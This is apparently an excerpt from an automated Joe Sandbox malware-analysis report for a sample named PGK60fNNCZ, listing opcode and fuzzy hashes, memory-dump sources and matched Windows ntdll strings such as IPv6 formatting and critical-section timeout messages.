                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22590c6cbbf3204e68809984c3e970c29331d68fa21cc449f646b07b5e80a1fe
                                                            • Instruction ID: a4e3fb642c4f0a9135999cbe4ad94930294439f752d9362b9bebdd4085d6a666
                                                            • Opcode Fuzzy Hash: 22590c6cbbf3204e68809984c3e970c29331d68fa21cc449f646b07b5e80a1fe
                                                            • Instruction Fuzzy Hash: 1311C272D00616ABDB22EF58CE82F5EF7B9EF84750F500059E901AB201D734AD01AB90
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 355316e1eaf3bcd96e59262f3731102d36c173b42356ac156017ff84debedf70
                                                            • Instruction ID: 3509f0b3ba9112bb091089a365d0d30e9011b2544311f27eda3ad98b7a318f8a
                                                            • Opcode Fuzzy Hash: 355316e1eaf3bcd96e59262f3731102d36c173b42356ac156017ff84debedf70
                                                            • Instruction Fuzzy Hash: 5701DFB1684700AFD3366B19D841B0ABAACAF85F50F11042AB2858F391D6B5D8408B94
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dc7aca3260fff4307b80d125e59923c01271f3d9b9e1da8d94cc3cb323d85b24
                                                            • Instruction ID: 74db771339001352e37fc1d25b69afe5b207a5e08d130f4f2e071a6522aad888
                                                            • Opcode Fuzzy Hash: dc7aca3260fff4307b80d125e59923c01271f3d9b9e1da8d94cc3cb323d85b24
                                                            • Instruction Fuzzy Hash: 72F0F473A41A20BBDB31DB568C40F07BAAAEB84BA0F154029B50597640CA34ED05EAA0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                            • Instruction ID: c400cfacb2cc98231e38b00387a0f38f32bc74ca18de68e2e0912c83090c8d61
                                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                            • Instruction Fuzzy Hash: D0F0C2B2A00A10ABD324DF4EDC41E57F7EADFC0B90F048129A505C7320EA31DD04CB90
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • API String ID:
                                                            • Opcode ID: 3859e9264c707cd231e455bec487ec57c9c1946f23be3d4d198bcbc09d3a2b4d
                                                            • Instruction ID: 690853fd128e58842ec5f2173d7fa4574593483f22d7d58272b920b7d2321deb
                                                            • Opcode Fuzzy Hash: 3859e9264c707cd231e455bec487ec57c9c1946f23be3d4d198bcbc09d3a2b4d
                                                            • Instruction Fuzzy Hash: EE90023120144812D20471598804686000587D0741F55C032A6064655F9A6989927132
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bae6b31a5a166761f9d1cb9aff04472b5d22badcb041f82cb35130372287af7d
                                                            • Instruction ID: 413b2c9220d8dd908588744d6d0ab36e93ccf21d3369a0b833e277ee768c6d41
                                                            • Opcode Fuzzy Hash: bae6b31a5a166761f9d1cb9aff04472b5d22badcb041f82cb35130372287af7d
                                                            • Instruction Fuzzy Hash: D390023120144413D20071599508707000587D0741F55D432A0464558EDA5A89527122
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 76be3217032d800c35bd04c41fd73477213e51b1b5943dc4a279adf0ddc716d6
                                                            • Instruction ID: 0adf97cfe5139668185e9b5ef196f73133374d8aa91444f83cba7918d2595608
                                                            • Opcode Fuzzy Hash: 76be3217032d800c35bd04c41fd73477213e51b1b5943dc4a279adf0ddc716d6
                                                            • Instruction Fuzzy Hash: 6690022160544412D24071599418706001587D0741F55D032A0064554ECA5D8B5676A2
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f44fb1329c7877886e500933c20b12853f12072d9ab184ffe2fbdb8df1c3eff7
                                                            • Instruction ID: 38ce048f38b0f5254e61dec5a95b58ce687f905a850cc1e502675042fe04a264
                                                            • Opcode Fuzzy Hash: f44fb1329c7877886e500933c20b12853f12072d9ab184ffe2fbdb8df1c3eff7
                                                            • Instruction Fuzzy Hash: 9590023120144412D20075999408646000587E0741F55D032A5064555FCA6989927132
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7a8c8797cccdebe976e07654223b9c6843d4bf5bdf134213707e221d80d12f3
                                                            • Instruction ID: 5897352a92f0e7c6f79b2ffe3e31375f373460b6960966d43f3b15144678d777
                                                            • Opcode Fuzzy Hash: c7a8c8797cccdebe976e07654223b9c6843d4bf5bdf134213707e221d80d12f3
                                                            • Instruction Fuzzy Hash: FE90023120144852D20071598404B46000587E0741F55C037A0164654E8A19C9527522
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc3659631aa76e14429511486fb786d766399ab0b4b163bd6f0d861ea7da864c
                                                            • Instruction ID: c9982db9a5eebe5b990e5b013eeee3af01d8622b502fae3de11ed9f91dbce211
                                                            • Opcode Fuzzy Hash: fc3659631aa76e14429511486fb786d766399ab0b4b163bd6f0d861ea7da864c
                                                            • Instruction Fuzzy Hash: 3D900221242481625645B1598404507400697E0781795C033A1454950D892A9957E622
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc8682bdaa50befcc3ab4dae458c78af7818b3ca40ca90c6c1780a2b741d5200
                                                            • Instruction ID: 00fc34e1f140cdde1df6281460393166cd92cd277c250a5f018c42dee829b103
                                                            • Opcode Fuzzy Hash: bc8682bdaa50befcc3ab4dae458c78af7818b3ca40ca90c6c1780a2b741d5200
                                                            • Instruction Fuzzy Hash: 0390023124144412D24171598404606000997D0781F95C033A0464554F8A598B57BA62
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e89ab20348f78b14fedb2339d193d7c080b0bb98f3edd9d91ef90bcbf93adc50
                                                            • Instruction ID: fd36c4e91f639fe2b9f5bf7c9967b4f8888b7750394cfb84da30d60e2e3a616d
                                                            • Opcode Fuzzy Hash: e89ab20348f78b14fedb2339d193d7c080b0bb98f3edd9d91ef90bcbf93adc50
                                                            • Instruction Fuzzy Hash: 9190022130144013D240715994186064005D7E1741F55D032E0454554DDD1989576223
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 40048222f4250ce1efd1f4c24ae3feb2d89a2580b2ff0511ff3eb4dc47548a67
                                                            • Instruction ID: e8b00b20b8794699c41f5b52b2ce6bef3919bd738209f1515ffd56427f238fe3
                                                            • Opcode Fuzzy Hash: 40048222f4250ce1efd1f4c24ae3feb2d89a2580b2ff0511ff3eb4dc47548a67
                                                            • Instruction Fuzzy Hash: 9A90022921344012D2807159940860A000587D1742F95D436A0055558DCD19896A6322
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7316a63cbff6afdc3ddc7d245bca9dc8554e37474e204a9e561a684320c505cb
                                                            • Instruction ID: e507dbd778da18261279149e4db5432f321b04bf526457799f22c083258455ba
                                                            • Opcode Fuzzy Hash: 7316a63cbff6afdc3ddc7d245bca9dc8554e37474e204a9e561a684320c505cb
                                                            • Instruction Fuzzy Hash: 4C90022120548452D20075599408A06000587D0745F55D032A10A4595ECA398952B132
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 914e5b7a333538a52bb08dff42589d3cd118b2d0f221a4c8abd0da68a88f3b3d
                                                            • Instruction ID: a116a41a511060a517074c98469894a2202ceefdf524e807bab46d252d48d5b3
                                                            • Opcode Fuzzy Hash: 914e5b7a333538a52bb08dff42589d3cd118b2d0f221a4c8abd0da68a88f3b3d
                                                            • Instruction Fuzzy Hash: 4E90026120184413D24075598804607000587D0742F55C032A20A4555F8E2D8D527136
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83556623b239429a598748a5a50a8aeb3a27cbe155c0f9c91f9a23452834224f
                                                            • Instruction ID: c4b487590700dc1c4ac6f6ec7bf1fe8e8b0443fbdcae13f08793490d9acb3927
                                                            • Opcode Fuzzy Hash: 83556623b239429a598748a5a50a8aeb3a27cbe155c0f9c91f9a23452834224f
                                                            • Instruction Fuzzy Hash: 5090027120144412D24071598404746000587D0741F55C032A50A4554F8A5D8ED67666
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d5980f808370f6d9f3854a5044bf50767db468271c18f6d1acd9e80b0b3537b
                                                            • Instruction ID: 9839342db0711ae3d2337db593d0c2bc797cb695b77992694761594098713c97
                                                            • Opcode Fuzzy Hash: 5d5980f808370f6d9f3854a5044bf50767db468271c18f6d1acd9e80b0b3537b
                                                            • Instruction Fuzzy Hash: 0890022160144512D20171598404616000A87D0781F95C033A1064555FCE298A93B132
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6405716764a75bfc4f2963634262a41d0715daa21caf07517069f8e87abac96b
                                                            • Instruction ID: a68e3e6c6f3ce08d4947ada9d385ccd3acbe46862c9afbd659b2d0011cd93607
                                                            • Opcode Fuzzy Hash: 6405716764a75bfc4f2963634262a41d0715daa21caf07517069f8e87abac96b
                                                            • Instruction Fuzzy Hash: C690022130144412D202715984146060009C7D1785F95C033E1464555E8A298A53B133
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca3325fb8d8becbafddecef820879e0b258a51b21988583c4730d36462621490
                                                            • Instruction ID: 10bf07be44dda5e8d3541f22782f88bfce8c76212549297e58aca9c72c9f889a
                                                            • Opcode Fuzzy Hash: ca3325fb8d8becbafddecef820879e0b258a51b21988583c4730d36462621490
                                                            • Instruction Fuzzy Hash: 6F900221211C4052D30075698C14B07000587D0743F55C136A0194554DCD1989626522
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c09f45751c7d32fb230b149c1aca73d1785f1760d42edf40151cc1948601a621
                                                            • Instruction ID: 826fa0047d750c5fd875652a117d6b05f62e7e1d071518e3e3faecd4d23e74fc
                                                            • Opcode Fuzzy Hash: c09f45751c7d32fb230b149c1aca73d1785f1760d42edf40151cc1948601a621
                                                            • Instruction Fuzzy Hash: 019002216014405242407169C8449064005ABE1751755C132A09D8550E895D89666666
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e0d5ca8d0e9c77e7ede080c2e45795441010e32ab4e024d49b4153a8c591623d
                                                            • Instruction ID: 18a94a0d51072b004df766bfceb419d4a87f37cd9adbfe89016d99207a9c840e
                                                            • Opcode Fuzzy Hash: e0d5ca8d0e9c77e7ede080c2e45795441010e32ab4e024d49b4153a8c591623d
                                                            • Instruction Fuzzy Hash: 8390023120184412D20071598808747000587D0742F55C032A51A4555F8A69C9927532
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 712b7a4cc21204b0d4cbff6977719564735d0619eeab6afac3da530faad4851c
                                                            • Instruction ID: f8d06ad7b3e6c62b3653a83ece14d06643fa7b14627e8a5424e5e2f2847c4607
                                                            • Opcode Fuzzy Hash: 712b7a4cc21204b0d4cbff6977719564735d0619eeab6afac3da530faad4851c
                                                            • Instruction Fuzzy Hash: 9790023120184412D2007159881470B000587D0742F55C032A11A4555E8A2989527572
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad3ffd366faa1a35fb7f5767a2a1757b7db772c594069d747d96aa3d4fb23ee7
                                                            • Instruction ID: b518d914a01e14d49201ae1e12ab681362f43198cf5739b6277bb01fdd409b89
                                                            • Opcode Fuzzy Hash: ad3ffd366faa1a35fb7f5767a2a1757b7db772c594069d747d96aa3d4fb23ee7
                                                            • Instruction Fuzzy Hash: B390026121144052D20471598404706004587E1741F55C033A2194554DC92D8D626126
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb1aba4201b97c64a5353d00da11c6f30bf0d8713178225c29767777e632065f
                                                            • Instruction ID: 4a401b40222a8cb397117b08120839f5f28f2fb68f1ad3624ddc69a9aa8817dc
                                                            • Opcode Fuzzy Hash: bb1aba4201b97c64a5353d00da11c6f30bf0d8713178225c29767777e632065f
                                                            • Instruction Fuzzy Hash: 9A90026134144452D20071598414B060005C7E1741F55C036E10A4554E8A1DCD537127
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33db5965f78bfe2e3492687791ac11e62960f2572c1f138c4a16729775068574
                                                            • Instruction ID: 3cf55d9ddbd939e2a3e050330a727fab40515a1ca1d5972562633bb2b1834674
                                                            • Opcode Fuzzy Hash: 33db5965f78bfe2e3492687791ac11e62960f2572c1f138c4a16729775068574
                                                            • Instruction Fuzzy Hash: FE90022124144812D2407159C4147070006C7D0B41F55C032A0064554E8A1A8A6676B2
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf9a68cdf99c1bf19d97d20546a6666d1a954fffc655ef3175b44c291e3e1b3e
                                                            • Instruction ID: 1cec060edafa8303c2ce67d5f90f980be6df5846b4f63c24c08ebba9a7e883a9
                                                            • Opcode Fuzzy Hash: cf9a68cdf99c1bf19d97d20546a6666d1a954fffc655ef3175b44c291e3e1b3e
                                                            • Instruction Fuzzy Hash: BB90022120188452D24072598804B0F410587E1742F95C03AA4196554DCD1989566722
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: c7db5358ecc2dc51fff9bc9cb5a829b39f61e3c90ad9b4579aeacee396ac6e74
                                                            • Instruction ID: 95f2491547385ac238d578517c86b7712d51ff16b747792211030c427b6ae5b0
                                                            • Opcode Fuzzy Hash: c7db5358ecc2dc51fff9bc9cb5a829b39f61e3c90ad9b4579aeacee396ac6e74
                                                            • Instruction Fuzzy Hash: C85127B2E04216BFDB61DB98C89097EF7B9BB18300B14826AE495D3381D734DE40B7E1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 9bd67a279ba38630814d03e81cbc05ec09a846a4499d814d58bec043f3fc2335
                                                            • Instruction ID: 1238b3d0e57a0b1036051833e31c8c37207b752d7008bb149943240196151eaf
                                                            • Opcode Fuzzy Hash: 9bd67a279ba38630814d03e81cbc05ec09a846a4499d814d58bec043f3fc2335
                                                            • Instruction Fuzzy Hash: 9451F6B5B00645AFCB60DE9CD8D097EB7F8EF44200B4484A9F4D6D7642DAB4DA4087A0
                                                            Strings
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01004742
                                                            • Execute=1, xrefs: 01004713
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01004787
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01004655
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010046FC
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01004725
                                                            • ExecuteOptions, xrefs: 010046A0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 7af579516d627b19c38d1140967e63c5ca9f4165a73cdd3837cc3506e16f28c0
                                                            • Instruction ID: 6b561a8eff516141215b1b992d8f0ce44d2e5b7ba18ef120711d6da4340ac50a
                                                            • Opcode Fuzzy Hash: 7af579516d627b19c38d1140967e63c5ca9f4165a73cdd3837cc3506e16f28c0
                                                            • Instruction Fuzzy Hash: F1514931A0431A6AEF21BAA4DD87FED77A8FF04310F14009DE609A71C1E7759E45AF51
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                            • Instruction ID: 4d0c9d37f20c3d8804a989698ee5d92530b9ee6303597c054437a802d271324d
                                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                            • Instruction Fuzzy Hash: F5023571508341AFD345CF18C890A6FBBE9EFC8704F048A6DF9858B265DB36E945CB42
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: fb7fca438397dbaad376aef8f667f9a83dab5c3057d83f4734f495bedd64fd0c
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: E581CE31E05249DBDF249F68C8917FEBBA7AF85360F1E425BE861A7391C7348841EB50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$[$]:%u
                                                            • API String ID: 48624451-2819853543
                                                            • Opcode ID: 8fa22363f2c11456529abdd32a5387d112bcdfee7b415a2aa07f8b5fe4ad5408
                                                            • Instruction ID: 52b2ce043642e3448ffd717c9635a9494e64d709d43d81881752e7c56a549b2e
                                                            • Opcode Fuzzy Hash: 8fa22363f2c11456529abdd32a5387d112bcdfee7b415a2aa07f8b5fe4ad5408
                                                            • Instruction Fuzzy Hash: A521A6BAA00119ABDB10DF69DC91AEEBBE8AF54740F040166F944D3201EB30DA01D7A1
                                                            Strings
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010002BD
                                                            • RTL: Re-Waiting, xrefs: 0100031E
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010002E7
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: ad9fcd4f2c4f2ba2a05945554092e599a1ef5964ac2b40f617d001d28d26b559
                                                            • Instruction ID: a0686b0f0295d9e0f3902db412c8b0dc688c1dbf191d47d29243c32f552cf6fe
                                                            • Opcode Fuzzy Hash: ad9fcd4f2c4f2ba2a05945554092e599a1ef5964ac2b40f617d001d28d26b559
                                                            • Instruction Fuzzy Hash: 3FE1F2316087419FE722CF29CC84B9AB7E1BF84364F244A6DF5A58B2D1D774D848DB42
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 01007B8E
                                                            • RTL: Re-Waiting, xrefs: 01007BAC
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01007B7F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
